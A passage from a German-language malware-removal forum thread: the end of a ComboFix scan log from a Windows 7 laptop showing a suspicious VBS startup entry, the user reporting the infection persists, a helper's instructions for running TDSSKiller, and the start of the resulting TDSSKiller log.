[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NetLimiter"="c:\program files\NetLimiter 3\NLClientApp.exe" [2011-03-21 2910208]
"wtbchkxbde"="wscript.exe" [2009-07-14 141824]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"BackupManagerTray"="c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe" [2010-03-08 260608]
"StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2010-04-21 98304]
"LManager"="c:\program files (x86)\Launch Manager\LManager.exe" [2010-05-26 960080]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-02-12 43848]
"avgnt"="c:\program files (x86)\Avira\AntiVir Desktop\avgnt.exe" [2014-02-20 689744]
"HP Software Update"="c:\program files (x86)\Hp\HP Software Update\HPWuSchd2.exe" [2011-10-28 49208]
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-02-21 152392]
.
c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
wtbchkxbde..vbs [2013-9-22 73266]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Acer VCM.lnk - c:\program files (x86)\Acer\Acer VCM\AcerVCM.exe [2013-4-16 704032]
VR-NetWorld Auftragsprüfung.lnk - c:\program files (x86)\VR-NetWorld\vrtoolcheckorder.exe /autostart [2014-1-9 1137664]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 AmUStor;AM USB Stroage Driver;c:\windows\system32\drivers\AmUStor.SYS;c:\windows\SYSNATIVE\drivers\AmUStor.SYS [x]
R3 AthBTPort;Atheros Virtual Bluetooth Class;c:\windows\system32\DRIVERS\btath_flt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_flt.sys [x]
R3 ATHDFU;Atheros Valkyrie USB BootROM;c:\windows\system32\Drivers\AthDfu.sys;c:\windows\SYSNATIVE\Drivers\AthDfu.sys [x]
R3 BTATH_A2DP;Bluetooth A2DP Audio Driver;c:\windows\system32\drivers\btath_a2dp.sys;c:\windows\SYSNATIVE\drivers\btath_a2dp.sys [x]
R3 BTATH_HCRP;Bluetooth HCRP Server driver;c:\windows\system32\DRIVERS\btath_hcrp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_hcrp.sys [x]
R3 BTATH_LWFLT;Bluetooth LWFLT Device;c:\windows\system32\DRIVERS\btath_lwflt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_lwflt.sys [x]
R3 BTATH_RCP;Bluetooth AVRCP Device;c:\windows\system32\DRIVERS\btath_rcp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_rcp.sys [x]
R3 BtFilter;BtFilter;c:\windows\system32\DRIVERS\btfilter.sys;c:\windows\SYSNATIVE\DRIVERS\btfilter.sys [x]
R3 Netaapl;Apple Mobile Device Ethernet Service;c:\windows\system32\DRIVERS\netaapl64.sys;c:\windows\SYSNATIVE\DRIVERS\netaapl64.sys [x]
R3 NLNdisPT;NetLimiter Ndis Protocol Service;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
R3 ose64;Office 64 Source Engine;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 WatAdminSvc;Windows-Aktivierungstechnologieservice;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
S1 avkmgr;avkmgr;c:\windows\system32\DRIVERS\avkmgr.sys;c:\windows\SYSNATIVE\DRIVERS\avkmgr.sys [x]
S1 nltdi;nltdi;c:\program files\NetLimiter 3\nltdi.sys;c:\program files\NetLimiter 3\nltdi.sys [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 AntiVirSchedulerService;Avira Planer;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe [x]
S2 AtherosSvc;AtherosSvc;c:\program files (x86)\Bluetooth Suite\adminservice.exe;c:\program files (x86)\Bluetooth Suite\adminservice.exe [x]
S2 DsiWMIService;Dritek WMI Service;c:\program files (x86)\Launch Manager\dsiwmis.exe;c:\program files (x86)\Launch Manager\dsiwmis.exe [x]
S2 ePowerSvc;Acer ePower Service;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [x]
S2 NTI IScheduleSvc;NTI IScheduleSvc;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe [x]
S2 RS_Service;Raw Socket Service;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe [x]
S2 UNS;Intel(R) Management & Security Application User Notification Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [x]
S2 Updater Service;Updater Service;c:\program files\Acer\Acer Updater\UpdaterService.exe;c:\program files\Acer\Acer Updater\UpdaterService.exe [x]
S3 BTATH_BUS;Atheros Bluetooth Bus;c:\windows\system32\DRIVERS\btath_bus.sys;c:\windows\SYSNATIVE\DRIVERS\btath_bus.sys [x]
S3 HECIx64;Intel(R) Management Engine Interface;c:\windows\system32\DRIVERS\HECIx64.sys;c:\windows\SYSNATIVE\DRIVERS\HECIx64.sys [x]
S3 intelkmd;intelkmd;c:\windows\system32\DRIVERS\igdpmd64.sys;c:\windows\SYSNATIVE\DRIVERS\igdpmd64.sys [x]
S3 L1C;NDIS Miniport Driver for Atheros AR813x/AR815x PCI-E Ethernet Controller;c:\windows\system32\DRIVERS\L1C62x64.sys;c:\windows\SYSNATIVE\DRIVERS\L1C62x64.sys [x]
S3 NLNdisMP;NLNdisMP;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
.
.
--- Andere Dienste/Treiber im Speicher ---
.
*NewlyCreated* - CDFS
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-04-02 06:02        1150280        ----a-w-        c:\program files (x86)\Google\Chrome\Application\33.0.1750.154\Installer\chrmstp.exe
.
Inhalt des "geplante Tasks" Ordners
.
2014-04-21 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
2014-04-22 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AmIcoSinglun64"="c:\program files (x86)\AmIcoSingLun\AmIcoSinglun64.exe" [2009-09-22 323584]
"mwlDaemon"="c:\program files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe" [BU]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2010-04-21 166424]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2010-04-21 391192]
"Persistence"="c:\windows\system32\igfxpers.exe" [2010-04-21 413720]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2010-01-20 9996320]
"RtHDVBg"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2010-01-20 877600]
"AtherosBtStack"="c:\program files (x86)\Bluetooth Suite\BtvStack.exe" [2010-05-25 585376]
"AthBtTray"="c:\program files (x86)\Bluetooth Suite\AthBtTray.exe" [2010-05-25 354464]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2010-03-09 345648]
"Acer ePower Management"="c:\program files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe" [2010-02-02 496160]
"BCSSync"="c:\program files\Microsoft Office\Office14\BCSSync.exe" [2012-11-05 108144]
"wtbchkxbde"="wscript.exe" [2009-07-14 168960]
.
------- Zusätzlicher Suchlauf -------
.
uStart Page = hxxp://www.google.com.ph/intl/en/
uLocal Page = c:\windows\system32\blank.htm
mDefault_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mStart Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
IE: An OneNote s&enden - c:\progra~1\MICROS~2\Office14\ONBttnIE.dll/105
IE: Nach Microsoft E&xcel exportieren - c:\progra~1\MICROS~2\Office14\EXCEL.EXE/3000
TCP: DhcpNameServer = 172.20.10.1
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
.
Toolbar-Locked - (no file)
Wow6432Node-HKLM-Run-<NO NAME> - (no file)
.
.
.
--------------------- Gesperrte Registrierungsschluessel ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil10e.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\FlashUtil10e.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.10"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Zeit der Fertigstellung: 2014-04-22  04:04:36
ComboFix-quarantined-files.txt  2014-04-22 02:04
ComboFix2.txt  2014-04-20 23:42
.
Vor Suchlauf: 23 Verzeichnis(se), 32.880.988.160 Bytes frei
Nach Suchlauf: 24 Verzeichnis(se), 32.620.032.000 Bytes frei
.
- - End Of File - - 46C200F9369BDCE1A9C3EF3BBBCCAF62

Virus weiterhin vorhanden.
Mir ist übrigens aufgefallen dass meine Dokumente und Einstellungen undDocuments and Settings jetzt versteckt sind und der Zugriff verweigert wird, ausserdem habe ich einen 2. Programme-Ordner der auch versteckt ist und auf den nicht zugegriffen werden kann.

schrauber 22.04.2014 14:22

Die ordner sind bestimmt leicht ausgegraut oder? Das ist normal.

Downloade dir bitte TDSSKiller TDSSKiller.exe und speichere diese Datei auf dem Desktop
  • Starte die TDSSKiller.exe - Einstellen wie in der Anleitung zu TDSSKiller beschrieben.
  • Drücke Start Scan
  • Sollten infizierte Objekte gefunden werden, wähle keinesfalls Cure. Wähle Skip und klicke auf Continue.
    TDSSKiller wird eine Logfile auf deinem Systemlaufwerk speichern (Meistens C:\)
    Als Beispiel: C:\TDSSKiller.<Version_Datum_Uhrzeit>log.txt
Poste den Inhalt bitte in jedem Fall hier in deinen Thread.

fxak 22.04.2014 16:35

Stimmt, Ordner sind nicht versteckt sondern ausgegraut.

TDSSKiller:
Code:

17:29:54.0467 7080  TDSS rootkit removing tool 2.8.16.0 Feb 11 2013 18:50:42
17:29:54.0486 7080  ============================================================
17:29:54.0486 7080  Current date / time: 2014/04/22 17:29:54.0486
17:29:54.0487 7080  SystemInfo:
17:29:54.0487 7080 
17:29:54.0487 7080  OS Version: 6.1.7600 ServicePack: 0.0
17:29:54.0487 7080  Product type: Workstation
17:29:54.0487 7080  ComputerName: FRANZ-PC
17:29:54.0487 7080  UserName: Franz
17:29:54.0487 7080  Windows directory: C:\Windows
17:29:54.0487 7080  System windows directory: C:\Windows
17:29:54.0487 7080  Running under WOW64
17:29:54.0487 7080  Processor architecture: Intel x64
17:29:54.0487 7080  Number of processors: 4
17:29:54.0487 7080  Page size: 0x1000
17:29:54.0487 7080  Boot type: Normal boot
17:29:54.0487 7080  ============================================================
17:29:55.0156 7080  Drive \Device\Harddisk0\DR0 - Size: 0x7470C06000 (465.76 Gb), SectorSize: 0x200, Cylinders: 0xED81, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
17:29:55.0632 7080  Drive \Device\Harddisk1\DR1 - Size: 0x3A9440000 (14.64 Gb), SectorSize: 0x200, Cylinders: 0x777, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
17:29:55.0637 7080  ============================================================
17:29:55.0637 7080  \Device\Harddisk0\DR0:
17:29:55.0638 7080  MBR partitions:
17:29:55.0638 7080  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x1964800, BlocksNum 0x32000
17:29:55.0638 7080  \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x1996800, BlocksNum 0x389EF030
17:29:55.0638 7080  \Device\Harddisk1\DR1:
17:29:55.0639 7080  MBR partitions:
17:29:55.0639 7080  \Device\Harddisk1\DR1\Partition1: MBR, Type 0xC, StartLBA 0x1F80, BlocksNum 0x1D48280
17:29:55.0639 7080  ============================================================
17:29:55.0693 7080  C: <-> \Device\Harddisk0\DR0\Partition2
17:29:55.0694 7080  ============================================================
17:29:55.0694 7080  Initialize success
17:29:55.0694 7080  ============================================================
17:30:18.0095 7020  ============================================================
17:30:18.0095 7020  Scan started
17:30:18.0095 7020  Mode: Manual; SigCheck; TDLFS;
17:30:18.0095 7020  ============================================================
17:30:18.0303 7020  ================ Scan system memory ========================
17:30:18.0304 7020  System memory - ok
17:30:18.0304 7020  ================ Scan services =============================
17:30:18.0480 7020  [ 1B00662092F9F9568B995902F0CC40D5 ] 1394ohci        C:\Windows\system32\DRIVERS\1394ohci.sys
17:30:18.0586 7020  1394ohci - ok
17:30:18.0617 7020  [ 6F11E88748CDEFD2F76AA215F97DDFE5 ] ACPI            C:\Windows\system32\DRIVERS\ACPI.sys
17:30:18.0636 7020  ACPI - ok
17:30:18.0671 7020  [ 63B05A0420CE4BF0E4AF6DCC7CADA254 ] AcpiPmi        C:\Windows\system32\DRIVERS\acpipmi.sys
17:30:18.0729 7020  AcpiPmi - ok
17:30:18.0766 7020  [ 2F6B34B83843F0C5118B63AC634F5BF4 ] adp94xx        C:\Windows\system32\DRIVERS\adp94xx.sys
17:30:18.0839 7020  adp94xx - ok
17:30:18.0875 7020  [ 597F78224EE9224EA1A13D6350CED962 ] adpahci        C:\Windows\system32\DRIVERS\adpahci.sys
17:30:18.0904 7020  adpahci - ok
17:30:18.0930 7020  [ E109549C90F62FB570B9540C4B148E54 ] adpu320        C:\Windows\system32\DRIVERS\adpu320.sys
17:30:18.0954 7020  adpu320 - ok
17:30:18.0973 7020  [ 4B78B431F225FD8624C5655CB1DE7B61 ] AeLookupSvc    C:\Windows\System32\aelupsvc.dll
17:30:19.0029 7020  AeLookupSvc - ok
17:30:19.0097 7020  [ DB9D6C6B2CD95A9CA414D045B627422E ] AFD            C:\Windows\system32\drivers\afd.sys
17:30:19.0167 7020  AFD - ok
17:30:19.0195 7020  [ 608C14DBA7299D8CB6ED035A68A15799 ] agp440          C:\Windows\system32\DRIVERS\agp440.sys
17:30:19.0223 7020  agp440 - ok
17:30:19.0278 7020  [ 3290D6946B5E30E70414990574883DDB ] ALG            C:\Windows\System32\alg.exe
17:30:19.0358 7020  ALG - ok
17:30:19.0422 7020  [ 5812713A477A3AD7363C7438CA2EE038 ] aliide          C:\Windows\system32\DRIVERS\aliide.sys
17:30:19.0450 7020  aliide - ok
17:30:19.0534 7020  [ 671D9DCA48DA807780D8409C18ED0AE0 ] AMD External Events Utility C:\Windows\system32\atiesrxx.exe
17:30:19.0635 7020  AMD External Events Utility - ok
17:30:19.0689 7020  [ 1FF8B4431C353CE385C875F194924C0C ] amdide          C:\Windows\system32\DRIVERS\amdide.sys
17:30:19.0709 7020  amdide - ok
17:30:19.0749 7020  [ 7024F087CFF1833A806193EF9D22CDA9 ] AmdK8          C:\Windows\system32\DRIVERS\amdk8.sys
17:30:19.0795 7020  AmdK8 - ok
17:30:19.0984 7020  [ D3E6B2E1394D93FE9DB0BA24814B0D8F ] amdkmdag        C:\Windows\system32\DRIVERS\atipmdag.sys
17:30:20.0349 7020  amdkmdag - ok
17:30:20.0413 7020  [ CC4D915D786D3DA973B2EA9B95D59A29 ] amdkmdap        C:\Windows\system32\DRIVERS\atikmpag.sys
17:30:20.0450 7020  amdkmdap - ok
17:30:20.0502 7020  [ 1E56388B3FE0D031C44144EB8C4D6217 ] AmdPPM          C:\Windows\system32\DRIVERS\amdppm.sys
17:30:20.0615 7020  AmdPPM - ok
17:30:20.0652 7020  [ EC7EBAB00A4D8448BAB68D1E49B4BEB9 ] amdsata        C:\Windows\system32\drivers\amdsata.sys
17:30:20.0686 7020  amdsata - ok
17:30:20.0721 7020  [ F67F933E79241ED32FF46A4F29B5120B ] amdsbs          C:\Windows\system32\DRIVERS\amdsbs.sys
17:30:20.0770 7020  amdsbs - ok
17:30:20.0783 7020  [ DB27766102C7BF7E95140A2AA81D042E ] amdxata        C:\Windows\system32\drivers\amdxata.sys
17:30:20.0815 7020  amdxata - ok
17:30:20.0859 7020  [ 391887990CDAA83DE5C56C3FDE966DA1 ] AmUStor        C:\Windows\system32\drivers\AmUStor.SYS
17:30:20.0901 7020  AmUStor - ok
17:30:21.0034 7020  [ 4D282B9C5BB05DF92C9F3977DFB9F916 ] AntiVirSchedulerService C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
17:30:21.0061 7020  AntiVirSchedulerService - ok
17:30:21.0086 7020  [ 65AF41A7A2C5B6693E1B4164E7632C3E ] AntiVirService  C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
17:30:21.0107 7020  AntiVirService - ok
17:30:21.0164 7020  [ 6F9EF180BB9CEC92D3E8EC9163748DE5 ] ApfiltrService  C:\Windows\system32\DRIVERS\Apfiltr.sys
17:30:21.0341 7020  ApfiltrService - ok
17:30:21.0374 7020  [ 42FD751B27FA0E9C69BB39F39E409594 ] AppID          C:\Windows\system32\drivers\appid.sys
17:30:21.0415 7020  AppID - ok
17:30:21.0449 7020  [ 0BC381A15355A3982216F7172F545DE1 ] AppIDSvc        C:\Windows\System32\appidsvc.dll
17:30:21.0550 7020  AppIDSvc - ok
17:30:21.0587 7020  [ D065BE66822847B7F127D1F90158376E ] Appinfo        C:\Windows\System32\appinfo.dll
17:30:21.0626 7020  Appinfo - ok
17:30:21.0754 7020  [ 221564CC7BE37611FE15EACF443E1BF6 ] Apple Mobile Device C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
17:30:21.0775 7020  Apple Mobile Device - ok
17:30:21.0840 7020  [ C484F8CEB1717C540242531DB7845C4E ] arc            C:\Windows\system32\DRIVERS\arc.sys
17:30:21.0868 7020  arc - ok
17:30:21.0902 7020  [ 019AF6924AEFE7839F61C830227FE79C ] arcsas          C:\Windows\system32\DRIVERS\arcsas.sys
17:30:21.0930 7020  arcsas - ok
17:30:22.0035 7020  [ 9217D874131AE6FF8F642F124F00A555 ] aspnet_state    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
17:30:22.0067 7020  aspnet_state - ok
17:30:22.0094 7020  [ 769765CE2CC62867468CEA93969B2242 ] AsyncMac        C:\Windows\system32\DRIVERS\asyncmac.sys
17:30:22.0172 7020  AsyncMac - ok
17:30:22.0207 7020  [ 02062C0B390B7729EDC9E69C680A6F3C ] atapi          C:\Windows\system32\DRIVERS\atapi.sys
17:30:22.0223 7020  atapi - ok
17:30:22.0258 7020  [ 1C60A629AD4FFD06D80CD522B92CDB7C ] AthBTPort      C:\Windows\system32\DRIVERS\btath_flt.sys
17:30:22.0285 7020  AthBTPort - ok
17:30:22.0316 7020  [ 4ECC791539F23982411864037D1AC8FC ] ATHDFU          C:\Windows\system32\Drivers\AthDfu.sys
17:30:22.0525 7020  ATHDFU - ok
17:30:22.0561 7020  [ A31F72621C938048CBA02E82542F0715 ] AtherosSvc      C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
17:30:22.0604 7020  AtherosSvc ( UnsignedFile.Multi.Generic ) - warning
17:30:22.0604 7020  AtherosSvc - detected UnsignedFile.Multi.Generic (1)
17:30:22.0703 7020  [ 70260C7C98CC0101316F5B2650C3BB44 ] athr            C:\Windows\system32\DRIVERS\athrx.sys
17:30:22.0830 7020  athr - ok
17:30:22.0874 7020  [ 637E0753BD6DEB8EA5314A5C357EC1A0 ] AtiHdmiService  C:\Windows\system32\drivers\AtiHdmi.sys
17:30:23.0057 7020  AtiHdmiService - ok
17:30:23.0102 7020  [ 07721A77180EDD4D39CCB865BF63C7FD ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
17:30:23.0167 7020  AudioEndpointBuilder - ok
